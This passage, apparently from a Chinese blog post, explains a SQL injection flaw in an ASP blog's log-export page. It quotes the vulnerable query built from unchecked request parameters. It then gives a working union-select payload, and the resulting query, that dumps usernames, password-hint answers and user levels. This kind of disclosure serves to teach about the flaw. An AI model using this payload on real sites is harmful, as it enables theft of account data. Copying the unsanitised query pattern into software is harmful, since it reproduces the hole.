不过，这个导出日志的asp文件存在sql injection漏洞，

本来是导出自己的文章的，

这样一来，数据库里的任何数据都可以随便导出了，

直接危害到整个blog系统的安全。

主要的SQL代码如下：

sdate=request("selecty")&"-"&request("selectm")&"-"&request("selectd")

edate=request("selectey")&"-"&request("selectem")&"-"&request("selected")

sql="select topic,addtime,logtext from blog where username='"&username&"' and addtime<=#"&edate&"# and

addtime>=#"&sdate&"#"

大家看到，所有的客户端数据都没有经过检查就直接使用了，

自然会有问题，

因为不管什么情况，客户端的数据都是不可轻易相信的。

那么，我们构造这样的输入

"selectd=22# and 1=2 union select username,answer,userlevel from [user] union select topic,addtime,logtext from blog

where addtime<=#1900-1-1"

整个的sql语句就变为了：

select topic,addtime,logtext from blog where username='慈勤强' and addtime<=#2007-2-22# and addtime>=#2000-2-22# and

1=2
union select username,answer,userlevel from [user]
union select topic,addtime,logtext from blog where addtime<=#1900-1-1#

这样，就可以输出所有的用户名、用户密码提示问题答案和用户等级了

当然也可以得到数据库中的任何内容了，只要适当的变换sql语句。